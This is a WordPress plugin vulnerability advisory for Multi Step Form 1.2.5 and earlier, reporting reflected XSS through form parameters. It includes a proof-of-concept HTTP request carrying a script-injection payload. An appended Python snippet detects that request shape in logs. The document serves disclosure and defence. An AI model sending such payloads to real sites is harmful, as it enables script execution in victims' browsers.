wpvulndb
Javier Olmedo
WPVDB-ID:09BEA732-3A70-4B0A-9BDD-88501A893629
Jul 20, 2018 - 12:00 a.m.

Multi Step Form <= 1.2.5 - Multiple Unauthenticated Reflected XSS

2018-07-20 00:00:00
Javier Olmedo
wpscan.com

EPSS: 0.001
Percentile: 41.5%

WordPress Plugin Multi Step Form before 1.2.5 allows remote users to execute JavaScript code through Reflected XSS attacks. This issue can be exploited by unauthenticated attackers, by the use of CSRF, for example.

PoC

The following parameters are vulnerable in fw_send_data function:

fw_data[id][1]
fw_data[id][2]
fw_data[id][3]
fw_data[id][4]
email

Proof of Concept (PoC):

The following POST request will cause it to display an alert in the browser when it runs:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/2018/07/10/hola-mundo/
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 207
Cookie: wp-settings-time-1=1531401661
Connection: close

action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fw_data%5BTest%5D%5B1%5D%5B%5D=2&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20&email=3%403.com&nonce=ba16aeb8b0
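For triage of web server or WAF logs, the request shape above can be matched directly. The following is an added example, not code from the advisory or the plugin: it parses a urlencoded admin-ajax.php body and flags fw_send_email submissions whose fw_data[...] or email values carry markup. The function name, the regular expressions and the benign sample are assumptions of this example.

```python
import re
from urllib.parse import parse_qsl

# Parameters the advisory names as reflected: fw_data[...][...] and email.
WATCHED = re.compile(r"^(?:fw_data(?:\[[^\]]*\])+|email)$")
# Heuristic for markup in a form answer (an assumption of this example,
# since the advisory does not show the reflection context).
MARKUP = re.compile(r"[<>]|[\"']\s*on\w+\s*=|javascript:", re.IGNORECASE)
# Deliberately strict shape for the email field (used with fullmatch).
EMAIL_OK = re.compile(r"[^\s<>\"'@]+@[^\s<>\"'@]+\.[^\s<>\"'@]+")


def suspicious_params(body: str) -> list[tuple[str, str]]:
    """Return (name, decoded value) pairs worth an analyst's attention.

    `body` is the raw urlencoded POST body sent to admin-ajax.php.
    Only requests for the fw_send_email action are inspected.
    """
    pairs = parse_qsl(body, keep_blank_values=True)  # percent-decodes once
    if ("action", "fw_send_email") not in pairs:
        return []
    hits = []
    for name, value in pairs:
        if not WATCHED.match(name):
            continue
        bad_email = name == "email" and not EMAIL_OK.fullmatch(value)
        if MARKUP.search(value) or bad_email:
            hits.append((name, value))
    return hits


# Body of the request shown in the advisory.
ADVISORY_BODY = (
    "action=fw_send_email&id=1"
    "&fw_data%5BTest%5D%5B0%5D%5B%5D=%3Cscript%3Ealert(1)%3C%2Fscript%3E"
    "&fw_data%5BTest%5D%5B1%5D%5B%5D=2"
    "&fw_data%5BTest%5D%5B2%5D%5B%5D=3%403.com"
    "&fw_data%5BTest%5D%5B3%5D%5B%5D=2018-07-20"
    "&email=3%403.com&nonce=ba16aeb8b0"
)
# Constructed benign submission for comparison.
BENIGN_BODY = (
    "action=fw_send_email&id=1&fw_data%5BTest%5D%5B0%5D%5B%5D=Alice"
    "&email=alice%40example.org&nonce=0000000000"
)

if __name__ == "__main__":
    for label, body in (("advisory", ADVISORY_BODY), ("benign", BENIGN_BODY)):
        print(label, suspicious_params(body))
```

The check is a log-side heuristic; the durable fix is upgrading the plugin past the affected versions.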
